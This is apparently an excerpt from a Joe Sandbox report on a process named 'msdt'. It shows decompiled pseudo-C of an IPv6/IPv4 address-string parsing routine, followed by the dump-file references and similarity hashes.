                                                                    				_v24 = 0;
                                                                    				_v8 = 0;
                                                                    				_v12 = 0;
                                                                    				_v16 = 0;
                                                                    				_v28 = 0;
                                                                    				_t136 = 0;
                                                                    				while(1) {
                                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                                    					if(_t167 == _t158) {
                                                                    						break;
                                                                    					}
                                                                    					_t118 = _v20 - _t158;
                                                                    					if(_t118 == 0) {
                                                                    						if(_t167 == 0x3a) {
                                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                                    								break;
                                                                    							} else {
                                                                    								_t119 =  &(_t164[1]);
                                                                    								if( *_t119 != _t167) {
                                                                    									break;
                                                                    								}
                                                                    								_t143 = 2;
                                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                    								_v28 = 1;
                                                                    								_v8 = _t143;
                                                                    								_t136 = _t136 + 1;
                                                                    								L47:
                                                                    								_t164 = _t119;
                                                                    								_v20 = _t143;
                                                                    								L14:
                                                                    								if(_v24 == _t158) {
                                                                    									L19:
                                                                    									_t164 =  &(_t164[1]);
                                                                    									_t158 = 0;
                                                                    									continue;
                                                                    								}
                                                                    								if(_v12 == _t158) {
                                                                    									if(_v16 > 4) {
                                                                    										L29:
                                                                    										return 0xc000000d;
                                                                    									}
                                                                    									_t120 = E025CEE02(_v24, _t158, 0x10);
                                                                    									_t170 = _t170 + 0xc;
                                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                    									_t136 = _t136 + 1;
                                                                    									goto L19;
                                                                    								}
                                                                    								if(_v16 > 3) {
                                                                    									goto L29;
                                                                    								}
                                                                    								_t122 = E025CEE02(_v24, _t158, 0xa);
                                                                    								_t170 = _t170 + 0xc;
                                                                    								if(_t122 > 0xff) {
                                                                    									goto L29;
                                                                    								}
                                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                    								goto L19;
                                                                    							}
                                                                    						}
                                                                    						L21:
                                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                                    							break;
                                                                    						} else {
                                                                    							if(E025C685D(_t167, 4) == 0) {
                                                                    								if(E025C685D(_t167, 0x80) != 0) {
                                                                    									if(_v12 > 0) {
                                                                    										break;
                                                                    									}
                                                                    									_t127 = 1;
                                                                    									_a7 = 1;
                                                                    									_v24 = _t164;
                                                                    									_v20 = 1;
                                                                    									_v16 = 1;
                                                                    									L36:
                                                                    									if(_v20 == _t127) {
                                                                    										goto L19;
                                                                    									}
                                                                    									_t158 = 0;
                                                                    									goto L14;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							_a7 = 0;
                                                                    							_v24 = _t164;
                                                                    							_v20 = 1;
                                                                    							_v16 = 1;
                                                                    							goto L19;
                                                                    						}
                                                                    					}
                                                                    					_t130 = _t118 - 1;
                                                                    					if(_t130 != 0) {
                                                                    						if(_t130 == 1) {
                                                                    							goto L21;
                                                                    						}
                                                                    						_t127 = 1;
                                                                    						goto L36;
                                                                    					}
                                                                    					if(_t167 >= 0x80) {
                                                                    						L7:
                                                                    						if(_t167 == 0x3a) {
                                                                    							_t158 = 0;
                                                                    							if(_v12 > 0 || _v8 > 6) {
                                                                    								break;
                                                                    							} else {
                                                                    								_t119 =  &(_t164[1]);
                                                                    								if( *_t119 != _t167) {
                                                                    									_v8 = _v8 + 1;
                                                                    									L13:
                                                                    									_v20 = _t158;
                                                                    									goto L14;
                                                                    								}
                                                                    								if(_v28 != 0) {
                                                                    									break;
                                                                    								}
                                                                    								_v28 = _v8 + 1;
                                                                    								_t143 = 2;
                                                                    								_v8 = _v8 + _t143;
                                                                    								goto L47;
                                                                    							}
                                                                    						}
                                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                    							break;
                                                                    						} else {
                                                                    							_v12 = _v12 + 1;
                                                                    							_t158 = 0;
                                                                    							goto L13;
                                                                    						}
                                                                    					}
                                                                    					if(E025C685D(_t167, 4) != 0) {
                                                                    						_v16 = _v16 + 1;
                                                                    						goto L19;
                                                                    					}
                                                                    					if(E025C685D(_t167, 0x80) != 0) {
                                                                    						_v16 = _v16 + 1;
                                                                    						if(_v12 > 0) {
                                                                    							break;
                                                                    						}
                                                                    						_a7 = 1;
                                                                    						goto L19;
                                                                    					}
                                                                    					goto L7;
                                                                    				}
                                                                    				 *_a8 = _t164;
                                                                    				if(_v12 != 0) {
                                                                    					if(_v12 != 3) {
                                                                    						goto L29;
                                                                    					}
                                                                    					_v8 = _v8 + 1;
                                                                    				}
                                                                    				if(_v28 != 0 || _v8 == 7) {
                                                                    					if(_v20 != 1) {
                                                                    						if(_v20 != 2) {
                                                                    							goto L29;
                                                                    						}
                                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                    						L65:
                                                                    						_t105 = _v28;
                                                                    						if(_t105 != 0) {
                                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                    							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                    							_t110 = 8;
                                                                    							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                    						}
                                                                    						return 0;
                                                                    					}
                                                                    					if(_v12 != 0) {
                                                                    						if(_v16 > 3) {
                                                                    							goto L29;
                                                                    						}
                                                                    						_t114 = E025CEE02(_v24, 0, 0xa);
                                                                    						_t170 = _t170 + 0xc;
                                                                    						if(_t114 > 0xff) {
                                                                    							goto L29;
                                                                    						}
                                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                    						goto L65;
                                                                    					}
                                                                    					if(_v16 > 4) {
                                                                    						goto L29;
                                                                    					}
                                                                    					_t115 = E025CEE02(_v24, 0, 0x10);
                                                                    					_t170 = _t170 + 0xc;
                                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                    					goto L65;
                                                                    				} else {
                                                                    					goto L29;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
• Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: __fassign
                                                                    • String ID:
                                                                    • API String ID: 3965848254-0
                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                    • Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                    • Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%